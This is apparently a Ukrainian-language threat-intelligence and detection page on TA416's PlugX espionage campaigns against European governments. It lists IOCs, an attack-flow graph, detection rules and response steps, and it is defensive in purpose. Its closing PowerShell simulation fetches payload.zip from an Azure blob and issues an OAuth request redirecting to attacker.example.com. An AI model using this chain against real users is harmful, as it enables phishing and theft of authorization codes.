Я знову б повернувся до ЄС: TA416 відновлює кампанії шпигунства за європейськими урядами
Стежити 
Detection stack
- AIDR
- Alert
- ETL
- Query
Короткий зміст
TA416, група загроз, пов’язана з Китаєм, у середині 2025 року знову розпочала атаки на уряди і дипломатичні установи Європи після періоду зниження активності. Актори поєднують легку розвідку через веб-баги з доставкою налаштованого бекдору PlugX, змінюючи ланцюги початкового доступу, які включають приманки у стилі Cloudflare Turnstile, зловживання перенаправленням OAuth та завантаження з допомогою MSBuild. До березня 2026 року, за повідомленнями, та ж сама тактика розширилася на дипломатиційні цілі Близького Сходу на тлі загострення регіональних напружень, пов’язаних з Іраном. Кампанії спираються на компрометовані поштові скриньки, підписані бінарні файли Windows для завантаження DLL і швидкозмінювану інфраструктуру управління і контролю.
Розслідування
Proofpoint відстежував кілька хвиль спуфінгу, надісланих з безкоштовних поштових адрес і компрометованих урядових акаунтів, з використанням як пікселів відстеження, так і архівів зі зброєю. Архівні ланцюги використовували приховування ZIP з LNK-артефактами для запуску MSI або TAR пакетів, які потім запускали підписані виконувані файли для завантаження PlugX. Паралельно TA416 зловживав перенаправленням OAuth Microsoft Entra ID і використовував перейменовані бінарники MSBuild з шкідливими проектними файлами C# для отримання і виконання виконуваних завдань. Трафік C2 спостерігався через HTTP з RC4-зашифрованими повідомленнями і характерними структурами хедерів/куків, які використовувалися для формування запитів і відповідей.
Пом’якшення
Впровадьте сильну аутентифікацію електронною поштою і посиліть контроль над вхідним вмістом, що надходить від невідомих хмарних провайдерів зберігання. Моніторте підозріле виконання підписаних виконавчих файлів, які зазвичай зловживаються для завантаження (наприклад, cnmpaui.exe і steam_monitor.exe) і нададуть сигнал про аномальну поведінку пошуку DLL. Додайте виявлення для незвичайних підписів хедерів HTTP або куків, пов’язаних із зашифрованим C2, та блокуйте відомі домени/IP TA416 там, де це можливо. Посильте моніторинг кінцевих точок для новоствореної персистенції ключа Run і несподіваних записів файлів у публічні або спільні каталоги.
Відповідь
Якщо виявлено активність, ізолюйте хост, захопіть змінну пам’ять і збережіть відповідні логи кінцевих точок і поштові логи для визначення обсягу. Полюйте на артефакти PlugX, включаючи завантажувач CNCLID.dll, shellcode Canon.dat і mutex dGcEuQhKT. Скасуйте доступ до компрометованих акаунтів електронної пошти, перезавантажте облікові дані та видаліть будь-які заплановані завдання або інші механізми персистенції. Аналізуйте мережеву телеметрію на наявність RC4-зашифрованого HTTP-маяка, потім блокуйте пов’язані домени/URL і розширюйте полювання на всьому середовищі.
"graph TB %% Class Definitions Section classDef action fill:#ffcccc classDef tool fill:#ccccff classDef malware fill:#ffcc99 classDef process fill:#ccffcc %% Nodes action_initial_access["<b>Дія</b> – T1566 Фішинг: Фішингові електронні листи, надіслані з компрометованих акаунтів і загальний фішинг. Одержувачі натискають шкідливі посилання."] class action_initial_access action tool_phishing_email["<b>Інструмент</b> – <b>Ім’я</b>: Фішинговий електронний лист<br/><b>Техніка</b>: T1566"] class tool_phishing_email tool action_user_execution["<b>Дія</b> – T1204 Виконання користувачем: Жертви натискають шкідливе URL-посилання, яке веде до завантаження шкідливого ZIP."] class action_user_execution action tool_malicious_zip["<b>Інструмент</b> – <b>Ім’я</b>: Шкідливий ZIP-архів, що містить ярлик LNK"] class tool_malicious_zip tool action_lnk_smuggling["<b>Дія</b> – T1027.012 Перевезення через ярлики LNK: Ярлик LNK запускає Powershell скрипт."] class action_lnk_smuggling action process_powershell["<b>Процес</b> – Виконання PowerShell для вилучення підписаного бінарного файла"] class process_powershell process tool_signed_binary["<b>Інструмент</b> – <b>Ім’я</b>: cnmpaui.exe (підписаний легітимний бінарний файл)"] class tool_signed_binary tool action_dll_sideloading["<b>Дія</b> – T1218 Виконання системного бінарного проксі: Завантаження DLL завантажує шкідливий DLL."] class action_dll_sideloading action malware_malicious_dll["<b>Шкідливе ПЗ</b> – Шкідливий DLL, завантажений через остороннє завантаження"] class malware_malicious_dll malware action_msbuild_execution["<b>Дія</b> – T1127.001 Довірене середовище розробника: MSBuild використовується для завантаження і виконання PlugX."] class action_msbuild_execution action tool_msbuild["<b>Інструмент</b> – <b>Ім’я</b>: Перейменоване виконуване MSBuild"] class tool_msbuild tool tool_csharp_project["<b>Інструмент</b> – <b>Ім’я</b>: Шкідливий проектний файл C#"] class tool_csharp_project tool malware_plugx["<b>Шкідливе ПЗ</b> – Навантаження PlugX"] class malware_plugx malware action_persistence["<b>Дія</b> – T1037.001 Персистенція через ключ реєстру Run і модифікацію ярликів."] class action_persistence action process_registry["<b>Процес</b> – Створення ключа реєстру Run у HKCUSoftwareMicrosoftWindowsCurrentVersionRun"] class process_registry process action_defense_evasion["<b>Дія</b> – T1553.002 Підрив довіри: Зловживання підписаними бінарними файлами та важким обфускуванням."] class action_defense_evasion action action_apddomain_hijack["<b>Дія</b> – T1574.014 Перехоплення виконання потоку: Перехоплення AppDomainManager через ланцюг MSBuild"] class action_apddomain_hijack action action_c2["<b>Дія</b> – T1071.001 Веб-протоколи та T1573.001 Зашифрований канал: HTTP C2 з RC4 шифром"] class action_c2 action process_c2_communication["<b>Процес</b> – Зашифроване HTTP сполучення з сервером C2"] class process_c2_communication process action_exfiltration["<b>Дія</b> – T1041 Експіляція через канал C2: Дані відправляються зашифрованим каналом"] class action_exfiltration action %% Connections action_initial_access –>|доставляє| tool_phishing_email tool_phishing_email –>|містить посилання, що веде до| action_user_execution action_user_execution –>|завантажує| tool_malicious_zip tool_malicious_zip –>|містить| action_lnk_smuggling action_lnk_smuggling –>|виконує| process_powershell process_powershell –>|витягує| tool_signed_binary tool_signed_binary –>|завантажує| action_dll_sideloading action_dll_sideloading –>|завантажує| malware_malicious_dll malware_malicious_dll –>|готує середовище для| action_msbuild_execution action_msbuild_execution –>|використовує| tool_msbuild tool_msbuild –>|обробляє| tool_csharp_project tool_csharp_project –>|завантажує і запускає| malware_plugx malware_plugx –>|створює| action_persistence action_persistence –>|пише| process_registry action_persistence –>|модифікує ярлик для| action_lnk_smuggling action_persistence –>|включає| action_defense_evasion action_defense_evasion –>|застосовує| action_apddomain_hijack action_apddomain_hijack –>|включає| action_c2 action_c2 –>|спілкується через| process_c2_communication process_c2_communication –>|експілотовує дані через| action_exfiltration "
Потік атаки
Виявлення
Підозрілі витягнуті файли з архіву (через file_event)
Переглянути
Підозрілі файли в профілі публічного користувача (через file_event)
Переглянути
Можлива інфільтрація/експіляція даних/C2 через сервіси/інструменти третіх сторін (через dns)
Переглянути
Можливе зловживання перенаправленням OAuth (через proxy)
Переглянути
Індикатори компрометації (HashSha256) для виявлення: Я б повернувся до ЄС: TA416 відновлює шпигунські кампанії проти європейських урядів Частина 3
Переглянути
Індикатори компрометації (HashSha256) для виявлення: Я б повернувся до ЄС: TA416 відновлює шпигунські кампанії проти європейських урядів Частина 2
Переглянути
Індикатори компрометації (HashSha256) для виявлення: Я б повернувся до ЄС: TA416 відновлює шпигунські кампанії проти європейських урядів Частина 1
Переглянути
Виявлення доменів управління і контролю TA416 [Windows Network Connection]
Переглянути
Доставка шкідливого ПЗ TA416 через Microsoft Azure Blob Storage і зловживання OAuth [Azure Activity Logs]
Переглянути
Екзекуційна симуляція
Передумова: Телеметрія та передпольотна перевірка повинні бути пройдені.
Обгрунтування: Цей розділ детально описує точний виконання техніки супротивника (TTP), призначену для спрацьовування правила виявлення. Команди і наратив безпосередньо відображають ідентифіковані TTP і мають на меті створити точну телеметрію, очікувану логікою виявлення.
-
Опис нападу та команди:
- Стадія завантаження пейлоаду: Зловмисник завантажує шкідливий ZIP файл (
payload.zip) у контейнер Azure Blobmydownload.z29.web.core.windows.net. - Створіть приманкову сторінку: Шкідлива HTML-сторінка, що розміщена на тому ж домені, містить тег
<img>який вказує на URL Azure Blob (ініціюючи завантаження) and прихований<iframe>який відразу перенаправляє жертву до точки авторизації Microsoft Entra ID OAuth 2.0 зredirect_uriвказуючи на домен під контролем зловмисника. - Взаємодія жертви: Жертва відвідує приманкову сторінку (наприклад, через фішинговий електронний лист). Браузер здійснює два HTTP GET запити поспіль — один на URL Blob, і один на URL OAuth. Журнали активності Azure реєструють обидва запити в тій самій сесії проксі, відповідаючи умові правила
selection_blob AND selection_oauth.
- Стадія завантаження пейлоаду: Зловмисник завантажує шкідливий ZIP файл (
-
Сценарій регресійного тестування: (виконаний з комп’ютера жертви, щоб відтворити телеметрію)
# Симуляція запуску тригера TA416 Azure Blob + OAuth # Крок 1: Завантаження шкідливого блока (симульоване за допомогою безпечного файла) Invoke-WebRequest -Uri "https://mydownload.z29.web.core.windows.net/payload.zip" -OutFile "$env:TEMPpayload.zip" # Крок 2: Негайно викликай URL авторизації OAuth (змодельовано перенаправлення) $oauthUrl = "https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=FAKE_CLIENT_ID&response_type=code&redirect_uri=https://attacker.example.com/callback" Invoke-WebRequest -Uri $oauthUrl -Method GET -UseBasicParsing | Out-Null Write-Host "Симуляція завершена – обидва URL запитані." -
Команди очищення:
# Видалити завантажений файл Remove-Item -Path "$env:TEMPpayload.zip" -Force -ErrorAction SilentlyContinue # Очистити змінні сесії PowerShell Remove-Variable -Name oauthUrl -ErrorAction SilentlyContinue